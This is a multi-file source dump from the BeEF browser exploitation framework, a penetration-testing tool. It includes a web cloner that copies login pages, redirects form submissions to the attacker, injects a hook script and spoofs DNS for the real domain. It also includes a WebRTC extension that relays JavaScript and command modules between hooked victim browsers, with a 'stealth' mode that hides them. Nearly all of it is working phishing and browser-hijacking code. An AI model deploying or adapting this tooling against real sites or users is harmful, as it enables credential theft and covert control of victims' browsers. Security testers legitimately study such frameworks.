# Modify the <form> line changing the action URI to / in order to be properly intercepted by BeEF
if line.include?('<form ') || line.include?('<FORM ')
line_attrs = line.split(' ')
c = 0
cc = 0
# TODO: probably doable also with map!
# modify the form 'action' attribute
line_attrs.each do |attr|
if attr.include? 'action="'
print_info "Form action found: #{attr}"
break
end
c += 1
end
line_attrs[c] = "action=\"#{mount}\""
# TODO: to be tested, needed in case like yahoo
# delete the form 'onsubmit' attribute
# line_attrs.each do |attr|
# if attr.include? "onsubmit="
# print_info "Form onsubmit event found: #{attr}"
# break
# end
# cc += 1
# end
# line_attrs[cc] = ""
mod_form = line_attrs.join(' ')
print_info 'Form action value changed in order to be intercepted :-D'
out_file.print mod_form
# Add the BeEF hook
elsif (line.include?('</head>') || line.include?('</HEAD>')) && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook')
out_file.print add_beef_hook(line)
print_info 'BeEF hook added :-D'
else
out_file.print line
end
end
end
end
end
if File.size((@cloned_pages_dir + output).to_s).zero?
print_error "Error cloning #{url}. Be sure that you don't have errors while retrieving the page with 'wget'."
return false
end
print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]"
file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve
# Split the URL mounting only the path and ignoring the query string.
# If the user wants to clone http://example.local/login.jsp?example=123&test=456
# then the phishing link can be used anyway with all the proper parameters to look legit.
mount = mount.split('?').first if mount.include?('?')
mount = mount.split(';').first if mount.include?(';')
interceptor = BeEF::Extension::SocialEngineering::Interceptor
interceptor.set :redirect_to, url
interceptor.set :frameable, url_is_frameable?(url)
interceptor.set :beef_hook, @beef_hook
interceptor.set :cloned_page, get_page_content(file_path)
interceptor.set :db_entry, persist_page(url, mount)
# Add a DNS record spoofing the address of the cloned webpage as the BeEF server
if dns_spoof
dns = BeEF::Extension::Dns::Server.instance
ipv4 = Socket.ip_address_list.detect { |ai| ai.ipv4? && !ai.ipv4_loopback? }.ip_address
ipv6 = Socket.ip_address_list.detect { |ai| ai.ipv6? && !ai.ipv6_loopback? }.ip_address
ipv6.gsub!(/%\w*$/, '')
domain = url.gsub(%r{^http://}, '')
unless ipv4.nil?
dns.add_rule(
pattern: domain,
resource: Resolv::DNS::Resource::IN::A,
response: ipv4
)
end
unless ipv6.nil?
dns.add_rule(
pattern: domain,
resource: Resolv::DNS::Resource::IN::AAAA,
response: ipv6
)
end
print_info "DNS records spoofed [A: #{ipv4} AAAA: #{ipv6}]"
end
print_info "Mounting cloned page on URL [#{mount}]"
@http_server.mount(mount.to_s, interceptor.new)
@http_server.remap
true
end
private
# Replace </head> with <BeEF_hook></head>
def add_beef_hook(line)
# @todo why is this an inline replace? and why is the second branch empty?
if line.include?('</head>')
line.gsub!('</head>', "<script type=\"text/javascript\" src=\"#{@beef_hook}\"></script>\n</head>")
elsif line.gsub!('</HEAD>', "<script type=\"text/javascript\" src=\"#{@beef_hook}\"></script>\n</HEAD>")
end
line
end
# Check if the URL X-Frame-Options header allows the page to be framed.
# @todo check for framebusting JS code
# @todo check CSP
def url_is_frameable?(url)
uri = URI(url)
http = Net::HTTP.new(uri.host, uri.port)
if uri.scheme == 'https'
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE unless @config.get('beef.extension.social_engineering.web_cloner.verify_ssl')
end
request = Net::HTTP::Get.new(uri.request_uri)
response = http.request(request)
frame_opt = response['X-Frame-Options']
# @todo why is this using casecmp?
if !frame_opt.nil? && (frame_opt.casecmp('DENY') == 0 || frame_opt.casecmp('SAMEORIGIN') == 0)
print_info "URL can be framed: #{url}"
return true
end
print_info "URL cannot be framed: #{url}"
false
rescue StandardError => e
print_error "Unable to determine if URL can be framed: #{url}"
print_debug e
# print_debug e.backtrace
false
end
def get_page_content(file_path)
file = File.open(file_path, 'r')
cloned_page = file.read
file.close
cloned_page
end
def persist_page(uri, mount)
webcloner_db = BeEF::Core::Models::WebCloner.new(
uri: uri,
mount: mount
)
webcloner_db.save
webcloner_db
end
end
end
end
end |
Text | beef/extensions/social_engineering/web_cloner/cloned_pages/readme.txt | This is the directory where the cloned pages will be placed.
If you clone beefproject.com, there will be 2 files:
- beefproject.com <- original, unmodified
- beefproject.com_mod <- modified one
In case you want to further modify the beefproject.com_mod manually,
and serve it through BeEF, do the following:
- clone the page
- modify the beefproject.com_mod file
- clone the same page again, adding the "use_existing":"true" parameter in the RESTful API call.
In this way the x_mod page will be served, with your custom modifications. |
Ruby | beef/extensions/webrtc/api.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module WebRTC
module RegisterHttpHandler
BeEF::API::Registrar.instance.register(BeEF::Extension::WebRTC::RegisterHttpHandler, BeEF::API::Server, 'mount_handler')
# We register the http handler for the WebRTC signalling extension.
# This http handler will handle WebRTC signals from browser to browser
# We also define an rtc message handler, so that the beefwebrtc object can send messages back into BeEF
def self.mount_handler(beef_server)
beef_server.mount('/rtcsignal', BeEF::Extension::WebRTC::SignalHandler)
beef_server.mount('/rtcmessage', BeEF::Extension::WebRTC::MessengeHandler)
beef_server.mount('/api/webrtc', BeEF::Extension::WebRTC::WebRTCRest.new)
end
end
module RegisterPreHookCallback
BeEF::API::Registrar.instance.register(BeEF::Extension::WebRTC::RegisterPreHookCallback, BeEF::API::Server::Hook, 'pre_hook_send')
# We register this pre hook action to ensure that signals going to a browser are included back in the hook.js polling
# This is also used so that BeEF can send RTCManagement messages to the hooked browser too
def self.pre_hook_send(hooked_browser, body, params, request, response)
dhook = BeEF::Extension::WebRTC::API::Hook.new
dhook.requester_run(hooked_browser, body)
end
end
end
end
end |
YAML | beef/extensions/webrtc/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
extension:
webrtc:
name: 'WebRTC'
enable: false
authors: ["xntrik"]
stunservers: '["stun:stun.l.google.com:19302","stun:stun1.l.google.com:19302","turn:numb.viagenie.ca:3478"]'
# stunservers: '["stun:stun.l.google.com:19302"]'
turnservers: '{"username": "someone%40somewhere.com", "password": "somepass", "uris": ["turn:numb.viagenie.ca:3478?transport=udp","turn:numb.viagenie.ca:3478?transport=tcp"]}' |
Ruby | beef/extensions/webrtc/extension.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module WebRTC
extend BeEF::API::Extension
@short_name = 'webrtc'
@full_name = 'WebRTC'
@description = 'WebRTC extension to all browsers to connect to each other (P2P) with WebRTC'
end
end
end
require 'extensions/webrtc/models/rtcsignal'
require 'extensions/webrtc/models/rtcmanage'
require 'extensions/webrtc/models/rtcstatus'
require 'extensions/webrtc/models/rtcmodulestatus'
require 'extensions/webrtc/api/hook'
require 'extensions/webrtc/handlers'
require 'extensions/webrtc/api'
require 'extensions/webrtc/rest/webrtc' |
Ruby | beef/extensions/webrtc/handlers.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module WebRTC
#
# The http handler that manages the WebRTC signals sent from browsers to other browsers.
#
class SignalHandler
R = BeEF::Core::Models::RtcSignal
Z = BeEF::Core::Models::HookedBrowser
def initialize(data)
@data = data
setup()
end
def setup()
# validates the hook token
beef_hook = @data['beefhook'] || nil
(print_error "beefhook is null";return) if beef_hook.nil?
# validates the target hook token
target_beef_id = @data['results']['targetbeefid'] || nil
(print_error "targetbeefid is null";return) if target_beef_id.nil?
# validates the signal
signal = @data['results']['signal'] || nil
(print_error "Signal is null";return) if signal.nil?
# validates that a hooked browser with the beef_hook token exists in the db
zombie_db = Z.first(:session => beef_hook) || nil
(print_error "Invalid beefhook id: the hooked browser cannot be found in the database";return) if zombie_db.nil?
# validates that a target browser with the target_beef_token exists in the db
target_zombie_db = Z.first(:id => target_beef_id) || nil
(print_error "Invalid targetbeefid: the target hooked browser cannot be found in the database";return) if target_zombie_db.nil?
# save the results in the database
signal = R.new(
:hooked_browser_id => zombie_db.id,
:target_hooked_browser_id => target_zombie_db.id,
:signal => signal
)
signal.save
end
end
#
# The http handler that manages the WebRTC messages sent from browsers.
#
class MessengeHandler
Z = BeEF::Core::Models::HookedBrowser
def initialize(data)
@data = data
setup()
end
def setup()
# validates the hook token
beef_hook = @data['beefhook'] || nil
(print_error "beefhook is null";return) if beef_hook.nil?
# validates the target hook token
peer_id = @data['results']['peerid'] || nil
(print_error "peerid is null";return) if peer_id.nil?
# validates the message
message = @data['results']['message'] || nil
(print_error "Message is null";return) if message.nil?
# validates that a hooked browser with the beef_hook token exists in the db
zombie_db = Z.first(:session => beef_hook) || nil
(print_error "Invalid beefhook id: the hooked browser cannot be found in the database";return) if zombie_db.nil?
# validates that a browser with the peerid exists in the db
peer_zombie_db = Z.first(:id => peer_id) || nil
(print_error "Invalid peer_id: the peer hooked browser cannot be found in the database";return) if peer_zombie_db.nil?
# Writes the event into the BeEF Logger
BeEF::Core::Logger.instance.register('WebRTC', "Browser:#{zombie_db.id} received message from Browser:#{peer_zombie_db.id}: #{message}")
# Perform logic depending on message (updating database)
puts "message = '" + message + "'"
if (message == "ICE Status: connected")
# Find existing status message
stat = BeEF::Core::Models::Rtcstatus.first(:hooked_browser_id => zombie_db.id, :target_hooked_browser_id => peer_zombie_db.id) || nil
unless stat.nil?
stat.status = "Connected"
stat.updated_at = Time.now
stat.save
end
stat2 = BeEF::Core::Models::Rtcstatus.first(:hooked_browser_id => peer_zombie_db.id, :target_hooked_browser_id => zombie_db.id) || nil
unless stat2.nil?
stat2.status = "Connected"
stat2.updated_at = Time.now
stat2.save
end
elsif (message.end_with?("disconnected"))
stat = BeEF::Core::Models::Rtcstatus.first(:hooked_browser_id => zombie_db.id, :target_hooked_browser_id => peer_zombie_db.id) || nil
unless stat.nil?
stat.status = "Disconnected"
stat.updated_at = Time.now
stat.save
end
stat2 = BeEF::Core::Models::Rtcstatus.first(:hooked_browser_id => peer_zombie_db.id, :target_hooked_browser_id => zombie_db.id) || nil
unless stat2.nil?
stat2.status = "Disconnected"
stat2.updated_at = Time.now
stat2.save
end
elsif (message == "Stayin alive")
stat = BeEF::Core::Models::Rtcstatus.first(:hooked_browser_id => zombie_db.id, :target_hooked_browser_id => peer_zombie_db.id) || nil
unless stat.nil?
stat.status = "Stealthed!!"
stat.updated_at = Time.now
stat.save
end
stat2 = BeEF::Core::Models::Rtcstatus.first(:hooked_browser_id => peer_zombie_db.id, :target_hooked_browser_id => zombie_db.id) || nil
unless stat2.nil?
stat2.status = "Peer-controlled stealth-mode"
stat2.updated_at = Time.now
stat2.save
end
elsif (message == "Coming out of stealth...")
stat = BeEF::Core::Models::Rtcstatus.first(:hooked_browser_id => zombie_db.id, :target_hooked_browser_id => peer_zombie_db.id) || nil
unless stat.nil?
stat.status = "Connected"
stat.updated_at = Time.now
stat.save
end
stat2 = BeEF::Core::Models::Rtcstatus.first(:hooked_browser_id => peer_zombie_db.id, :target_hooked_browser_id => zombie_db.id) || nil
unless stat2.nil?
stat2.status = "Connected"
stat2.updated_at = Time.now
stat2.save
end
elsif (message.start_with?("execcmd"))
mod = /\(\/command\/(.*)\.js\)/.match(message)[1]
resp = /Result:.(.*)/.match(message)[1]
stat = BeEF::Core::Models::Rtcmodulestatus.new(:hooked_browser_id => zombie_db.id,
:target_hooked_browser_id => peer_zombie_db.id,
:command_module_id => mod,
:status => resp,
:created_at => Time.now,
:updated_at => Time.now)
stat.save
end
end
end
end
end
end |
Ruby | beef/extensions/webrtc/api/hook.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# A lot of this logic is cloned from the requester extension, which had a sane way of sending/recvng
# JS to the clients..
module BeEF
module Extension
module WebRTC
module API
require 'uri'
class Hook
include BeEF::Core::Handlers::Modules::BeEFJS
# If the RtcSignal table contains requests that need to be sent (has_sent = waiting), retrieve
# and send them to the hooked browser.
# Don't forget, these are signalling messages for a peer, so we don't check that the request
# is for the hooked_browser_id, but the target
# This logic also checks the Rtc
def requester_run(hb, body)
@body = body
rtcsignaloutput = []
rtcmanagementoutput = []
# Get all RTCSignals for this browser
BeEF::Core::Models::RtcSignal.where(:target_hooked_browser_id => hb.id, :has_sent => "waiting").each { |h|
# output << self.requester_parse_db_request(h)
rtcsignaloutput << h.signal
h.has_sent = "sent"
h.save
}
# Get all RTCManagement messages for this browser
BeEF::Core::Models::RtcManage.where(:hooked_browser_id => hb.id, :has_sent => "waiting").each {|h|
rtcmanagementoutput << h.message
h.has_sent = "sent"
h.save
}
# Return if we have no new data to add to hook.js
return if rtcsignaloutput.empty? and rtcmanagementoutput.empty?
config = BeEF::Core::Configuration.instance
ws = BeEF::Core::Websocket::Websocket.instance
# todo antisnatchor: prevent sending "content" multiple times. Better leaving it after the first run, and don't send it again.
#todo antisnatchor: remove this gsub crap adding some hook packing.
# The below is how antisnatchor was managing insertion of messages dependent on WebSockets or not
# Hopefully this still works
if config.get("beef.http.websocket.enable") && ws.getsocket(hb.session)
rtcsignaloutput.each {|o|
add_rtcsignal_to_body o
} unless rtcsignaloutput.empty?
rtcmanagementoutput.each {|o|
add_rtcmanagement_to_body o
} unless rtcmanagementoutput.empty?
# ws.send(content + @body,hb.session)
ws.send(@body,hb.session)
#if we use WebSockets, just reply wih the component contents
else # if we use XHR-polling, add the component to the main hook file
rtcsignaloutput.each {|o|
add_rtcsignal_to_body o
} unless rtcsignaloutput.empty?
rtcmanagementoutput.each {|o|
add_rtcmanagement_to_body o
} unless rtcmanagementoutput.empty?
end
end
def add_rtcsignal_to_body(output)
@body << %Q{
beef.execute(function() {
var peerid = null;
for (k in beefrtcs) {
if (beefrtcs[k].allgood === false) {
peerid = beefrtcs[k].peerid;
}
}
if (peerid == null) {
beef.debug('received a peer message, but, we are already setup?');
} else {
beefrtcs[peerid].processMessage(
JSON.stringify(#{output})
);
}
});
}
end
def add_rtcmanagement_to_body(output)
@body << %Q{
beef.execute(function() {
#{output}
});
}
end
end
end
end
end
end |
Ruby | beef/extensions/webrtc/models/rtcmanage.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Models
#
# Table stores the queued up JS commands for managing the client-side webrtc logic.
#
class RtcManage < BeEF::Core::Model
# Starts the RTCPeerConnection process, establishing a WebRTC connection between the caller and the receiver
def self.initiate(caller, receiver, verbosity = false)
stunservers = BeEF::Core::Configuration.instance.get("beef.extension.webrtc.stunservers")
turnservers = BeEF::Core::Configuration.instance.get("beef.extension.webrtc.turnservers")
# Add the beef.webrtc.start() JavaScript call into the RtcManage table - this will be picked up by the browser on next hook.js poll
# This is for the Receiver
r = BeEF::Core::Models::RtcManage.new(:hooked_browser_id => receiver, :message => "beef.webrtc.start(0,#{caller},JSON.stringify(#{turnservers}),JSON.stringify(#{stunservers}),#{verbosity});")
r.save!
# This is the same beef.webrtc.start() JS call, but for the Caller
r = BeEF::Core::Models::RtcManage.new(:hooked_browser_id => caller, :message => "beef.webrtc.start(1,#{receiver},JSON.stringify(#{turnservers}),JSON.stringify(#{stunservers}),#{verbosity});")
r.save!
end
# Advises a browser to send an RTCDataChannel message to its peer
# Similar to the initiate method, this loads up a JavaScript call to the beefrtcs[peerid].sendPeerMsg() function call
def self.sendmsg(from, to, message)
r = BeEF::Core::Models::RtcManage.new(:hooked_browser_id => from, :message => "beefrtcs[#{to}].sendPeerMsg('#{message}');")
r.save!
end
# Gets the browser to run the beef.webrtc.status() JavaScript function
# This JS function will return it's values to the /rtcmessage handler
def self.status(id)
r = BeEF::Core::Models::RtcManage.new(:hooked_browser_id => id, :message => "beef.webrtc.status(#{id});")
r.save!
end
end
end
end
end |
Ruby | beef/extensions/webrtc/models/rtcmodulestatus.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Models
#
# Table stores the webrtc status information
# This includes things like connection status, and executed modules etc
#
class Rtcmodulestatus < BeEF::Core::Model
belongs_to :hooked_browser
belongs_to :command_module
end
end
end
end |
Ruby | beef/extensions/webrtc/models/rtcsignal.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Models
#
# Table stores the webrtc signals from a hooked_browser, directed to a target_hooked_browser
#
class RtcSignal < BeEF::Core::Model
belongs_to :hooked_browser
end
end
end
end |
Ruby | beef/extensions/webrtc/models/rtcstatus.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Models
#
# Table stores the webrtc status information
# This includes things like connection status, and executed modules etc
#
class Rtcstatus < BeEF::Core::Model
belongs_to :hooked_browser
end
end
end
end |
Ruby | beef/extensions/webrtc/rest/webrtc.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module WebRTC
require 'base64'
# This class handles the routing of RESTful API requests that manage the
# WebRTC Extension
class WebRTCRest < BeEF::Core::Router::Router
# Filters out bad requests before performing any routing
before do
config = BeEF::Core::Configuration.instance
# Require a valid API token from a valid IP address
halt 401 unless params[:token] == config.get('beef.api_token')
halt 403 unless BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
#
# @note Initiate two browsers to establish a WebRTC PeerConnection
# Return success = true if the message has been queued - as this is
# asynchronous, you will have to monitor BeEFs event log for success
# messages. For instance: Event: Browser:1 received message from
# Browser:2: ICE Status: connected
#
# Alternatively, the new rtcstatus model also records events during
# RTC connectivity
#
# Input must be specified in JSON format (the verbose option is no
# longer required as client-debugging uses the beef.debug)
#
# +++ Example: +++
# POST /api/webrtc/go?token=5b17be64715a184d66e563ec9355ee758912a61d HTTP/1.1
# Host: 127.0.0.1:3000
# Content-Type: application/json; charset=UTF-8
#
# {"from":1, "to":2}
#===response (snip)===
# HTTP/1.1 200 OK
# Content-Type: application/json; charset=UTF-8
#
# {"success":"true"}
#
# +++ Example with verbosity on the client-side +++
# POST /api/webrtc/go?token=5b17be64715a184d66e563ec9355ee758912a61d HTTP/1.1
# Host: 127.0.0.1:3000
# Content-Type: application/json; charset=UTF-8
#
# {"from":1, "to":2, "verbose": true}
#===response (snip)===
# HTTP/1.1 200 OK
# Content-Type: application/json; charset=UTF-8
#
# {"success":"true"}
#
# +++ Example with curl +++
# curl -H "Content-type: application/json; charset=UTF-8" -v
# -X POST -d '{"from":1,"to":2,"verbose":true}'
# http://127.0.0.1:3000/api/webrtc/go\?token\=df67654b03d030d97018f85f0284247d7f49c348
post '/go' do
body = JSON.parse(request.body.read)
fromhb = body['from']
raise InvalidParamError, 'from' if fromhb.nil?
tohb = body['to']
raise InvalidParamError, 'to' if tohb.nil?
verbose = body['verbose']
result = {}
if [fromhb, tohb].include?(nil)
result['success'] = false
return result.to_json
end
if verbose.to_s =~ (/^(true|t|yes|y|1)$/i)
BeEF::Core::Models::RtcManage.initiate(fromhb.to_i, tohb.to_i, true)
else
BeEF::Core::Models::RtcManage.initiate(fromhb.to_i, tohb.to_i)
end
r = BeEF::Core::Models::Rtcstatus.new(
hooked_browser_id: fromhb.to_i,
target_hooked_browser_id: tohb.to_i,
status: 'Initiating..',
created_at: Time.now,
updated_at: Time.now
)
r.save
r2 = BeEF::Core::Models::Rtcstatus.new(
hooked_browser_id: tohb.to_i,
target_hooked_browser_id: fromhb.to_i,
status: 'Initiating..',
created_at: Time.now,
updated_at: Time.now
)
r2.save
result['success'] = true
result.to_json
rescue InvalidParamError => e
print_error e.message
halt 400
rescue StandardError => e
print_error "Internal error while initiating RTCPeerConnections .. (#{e.message})"
halt 500
end
#
# @note Get the RTCstatus of a particular browser (and its peers)
# Return success = true if the message has been queued - as this is asynchronous, you will have to monitor BeEFs event log
# for success messages. For instance: Event: Browser:1 received message from Browser:2: Status checking - allgood: true
#
# +++ Example: +++
# GET /api/webrtc/status/1?token=5b17be64715a184d66e563ec9355ee758912a61d HTTP/1.1
# Host: 127.0.0.1:3000
#
#===response (snip)===
# HTTP/1.1 200 OK
# Content-Type: application/json; charset=UTF-8
#
# {"success":"true"}
#
# +++ Example with curl +++
# curl -H "Content-type: application/json; charset=UTF-8" -v
# -X GET http://127.0.0.1:3000/api/webrtc/status/1\?token\=df67654b03d030d97018f85f0284247d7f49c348
get '/status/:id' do
id = params[:id]
BeEF::Core::Models::RtcManage.status(id.to_i)
result = {}
result['success'] = true
result.to_json
rescue InvalidParamError => e
print_error e.message
halt 400
rescue StandardError => e
print_error "Internal error while queuing status message for #{id} (#{e.message})"
halt 500
end
#
# @note Get the events from the RTCstatus model of a particular browser
# Return JSON with events_count and an array of events
#
# +++ Example: +++
# GET /api/webrtc/events/1?token=5b17be64715a184d66e563ec9355ee758912a61d HTTP/1.1
# Host: 127.0.0.1:3000
#
#===response (snip)===
# HTTP/1.1 200 OK
# Content-Type: application/json; charset=UTF-8
#
# {"events_count":1,"events":[{"id":2,"hb_id":1,"target_id":2,"status":"Connected","created_at":"timestamp","updated_at":"timestamp"}]}
#
# +++ Example with curl +++
# curl -H "Content-type: application/json; charset=UTF-8" -v
# -X GET http://127.0.0.1:3000/api/webrtc/events/1\?token\=df67654b03d030d97018f85f0284247d7f49c348
get '/events/:id' do
id = params[:id]
events = BeEF::Core::Models::Rtcstatus.where(hooked_browser_id: id)
events_json = []
count = events.length
events.each do |event|
events_json << {
'id' => event.id.to_i,
'hb_id' => event.hooked_browser_id.to_i,
'target_id' => event.target_hooked_browser_id.to_i,
'status' => event.status.to_s,
'created_at' => event.created_at.to_s,
'updated_at' => event.updated_at.to_s
}
end
unless events_json.empty?
{
'events_count' => count,
'events' => events_json
}.to_json
end
rescue InvalidParamError => e
print_error e.message
halt 400
rescue StandardError => e
print_error "Internal error while queuing status message for #{id} (#{e.message})"
halt 500
end
#
# @note Get the events from the RTCModuleStatus model of a particular browser
# Return JSON with events_count and an array of events associated with command module execute
#
# +++ Example: +++
# GET /api/webrtc/cmdevents/1?token=5b17be64715a184d66e563ec9355ee758912a61d HTTP/1.1
# Host: 127.0.0.1:3000
#
#===response (snip)===
# HTTP/1.1 200 OK
# Content-Type: application/json; charset=UTF-8
#
# {"events_count":1,"events":[{"id":2,"hb_id":1,"target_id":2,"status":"prompt=blah","mod":200,"created_at":"timestamp","updated_at":"timestamp"}]}
#
# +++ Example with curl +++
# curl -H "Content-type: application/json; charset=UTF-8" -v
# -X GET http://127.0.0.1:3000/api/webrtc/cmdevents/1\?token\=df67654b03d030d97018f85f0284247d7f49c348
get '/cmdevents/:id' do
id = params[:id]
events = BeEF::Core::Models::Rtcmodulestatus.where(hooked_browser_id: id)
events_json = []
count = events.length
events.each do |event|
events_json << {
'id' => event.id.to_i,
'hb_id' => event.hooked_browser_id.to_i,
'target_id' => event.target_hooked_browser_id.to_i,
'status' => event.status.to_s,
'created_at' => event.created_at.to_s,
'updated_at' => event.updated_at.to_s,
'mod' => event.command_module_id
}
end
unless events_json.empty?
{
'events_count' => count,
'events' => events_json
}.to_json
end
rescue InvalidParamError => e
print_error e.message
halt 400
rescue StandardError => e
print_error "Internal error while queuing status message for #{id} (#{e.message})"
halt 500
end
#
# @note Instruct a browser to send an RTC DataChannel message to one of its peers
# Return success = true if the message has been queued - as this is asynchronous, you will have to monitor BeEFs event log
# for success messages, IF ANY.
#
# Input must be specified in JSON format
#
# +++ Example: +++
# POST /api/webrtc/msg?token=5b17be64715a184d66e563ec9355ee758912a61d HTTP/1.1
# Host: 127.0.0.1:3000
# Content-Type: application/json; charset=UTF-8
#
# {"from":1, "to":2, "message":"Just a plain message"}
#===response (snip)===
# HTTP/1.1 200 OK
# Content-Type: application/json; charset=UTF-8
#
# {"success":"true"}
#
# +++ Example with curl +++
# curl -H "Content-type: application/json; charset=UTF-8" -v
# -X POST -d '{"from":1,"to":2,"message":"Just a plain message"}'
# http://127.0.0.1:3000/api/webrtc/msg\?token\=df67654b03d030d97018f85f0284247d7f49c348
#
# Available client-side "message" options and handling:
# !gostealth - will put the <to> browser into a stealth mode
# !endstealth - will put the <to> browser into normal mode, and it will start talking to BeEF again
# %<javascript> - will execute JavaScript on <to> sending the results back to <from> - who will relay back to BeEF
# <text> - will simply send a datachannel message from <from> to <to>.
# If the <to> is stealthed, it'll bounce the message back.
# If the <to> is NOT stealthed, it'll send the message back to BeEF via the /rtcmessage handler
post '/msg' do
body = JSON.parse(request.body.read)
fromhb = body['from']
raise InvalidParamError, 'from' if fromhb.nil?
tohb = body['to']
raise InvalidParamError, 'to' if tohb.nil?
message = body['message']
raise InvalidParamError, 'message' if message.nil?
if message === '!gostealth'
stat = BeEF::Core::Models::Rtcstatus.where(hooked_browser_id: fromhb.to_i, target_hooked_browser_id: tohb.to_i).first || nil
unless stat.nil?
stat.status = 'Selected browser has commanded peer to enter stealth'
stat.updated_at = Time.now
stat.save
end
stat2 = BeEF::Core::Models::Rtcstatus.where(hooked_browser_id: tohb.to_i, target_hooked_browser_id: fromhb.to_i).first || nil
unless stat2.nil?
stat2.status = 'Peer has commanded selected browser to enter stealth'
stat2.updated_at = Time.now
stat2.save
end
end
result = {}
if [fromhb, tohb, message].include?(nil)
result['success'] = false
else
BeEF::Core::Models::RtcManage.sendmsg(fromhb.to_i, tohb.to_i, message)
result['success'] = true
end
result.to_json
rescue InvalidParamError => e
print_error e.message
halt 400
rescue StandardError => e
print_error "Internal error while queuing message (#{e.message})"
halt 500
end
#
# @note Instruct a browser to send an RTC DataChannel message to one of its peers
# In this instance, the message is a Base64d encoded JS command
# which has the beef.net.send statements re-written
# Return success = true if the message has been queued - as this is asynchronous, you will have to monitor BeEFs event log
# for success messages, IF ANY.
# Commands are written back to the rtcmodulestatus model
#
# Input must be specified in JSON format
#
# +++ Example: +++
# POST /api/webrtc/cmdexec?token=5b17be64715a184d66e563ec9355ee758912a61d HTTP/1.1
# Host: 127.0.0.1:3000
# Content-Type: application/json; charset=UTF-8
#
# {"from":1, "to":2, "cmdid":120, "options":[{"name":"option_name","value":"option_value"}]}
#===response (snip)===
# HTTP/1.1 200 OK
# Content-Type: application/json; charset=UTF-8
#
# {"success":"true"}
#
# +++ Example with curl +++
# curl -H "Content-type: application/json; charset=UTF-8" -v
# -X POST -d '{"from":1, "to":2, "cmdid":120, "options":[{"name":"option_name","value":"option_value"}]}'
# http://127.0.0.1:3000/api/webrtc/cmdexec\?token\=df67654b03d030d97018f85f0284247d7f49c348
#
post '/cmdexec' do
body = JSON.parse(request.body.read)
fromhb = body['from']
raise InvalidParamError, 'from' if fromhb.nil?
tohb = body['to']
raise InvalidParamError, 'to' if tohb.nil?
cmdid = body['cmdid']
raise InvalidParamError, 'cmdid' if cmdid.nil?
cmdoptions = body['options'] if body['options']
cmdoptions = nil if cmdoptions.eql?('')
if [fromhb, tohb, cmdid].include?(nil)
result = {}
result['success'] = false
return result.to_json
end
# Find the module, modify it, send it to be executed on the tohb
# Validate the command module by ID
command_module = BeEF::Core::Models::CommandModule.find(cmdid)
error 404 if command_module.nil?
error 404 if command_module.path.nil?
# Get the key of the module based on the ID
key = BeEF::Module.get_key_by_database_id(cmdid)
error 404 if key.nil?
# Try to load the module
BeEF::Module.hard_load(key)
# Now the module is hard loaded, find it's object and get it
command_module = BeEF::Core::Command.const_get(
BeEF::Core::Configuration.instance.get(
"beef.module.#{key}.class"
)
).new(key)
# Check for command options
cmddata = cmdoptions.nil? ? [] : cmdoptions
# Get path of source JS
f = "#{command_module.path}command.js"
error 404 unless File.exist? f
# Read file
@eruby = Erubis::FastEruby.new(File.read(f))
# Parse in the supplied parameters
cc = BeEF::Core::CommandContext.new
cc['command_url'] = command_module.default_command_url
cc['command_id'] = command_module.command_id
cmddata.each do |v|
cc[v['name']] = v['value']
end
# Evalute supplied options
@output = @eruby.evaluate(cc)
# Gsub the output, replacing all beef.net.send commands
# This needs to occur because we want this JS to send messages
# back to the peer browser
@output = @output.gsub(/beef\.net\.send\((.*)\);?/) do |_s|
tmpout = "// beef.net.send removed\n"
tmpout += "beefrtcs[#{fromhb}].sendPeerMsg('execcmd ("
cmdurl = Regexp.last_match(1).split(',')
tmpout += cmdurl[0].gsub(/\s|"|'/, '')
tmpout += ") Result: ' + "
tmpout += cmdurl[2]
tmpout += ');'
tmpout
end
# Prepend the B64 version of the string with @
# The client JS receives the rtc message, detects the @
# and knows to decode it before execution
msg = "@#{Base64.strict_encode64(@output)}"
# Finally queue the message in the RTC queue for submission
# from the from browser to the to browser
BeEF::Core::Models::RtcManage.sendmsg(fromhb.to_i, tohb.to_i, msg)
result = {}
result['success'] = true
result.to_json
rescue JSON::ParserError => e
print_error "Invalid JSON: #{e.message}"
halt 400
rescue InvalidParamError => e
print_error e.message
halt 400
rescue StandardError => e
print_error "Internal error while executing command (#{e.message})"
halt 500
end
# Raised when invalid JSON input is passed to an /api/webrtc handler.
class InvalidJsonError < StandardError
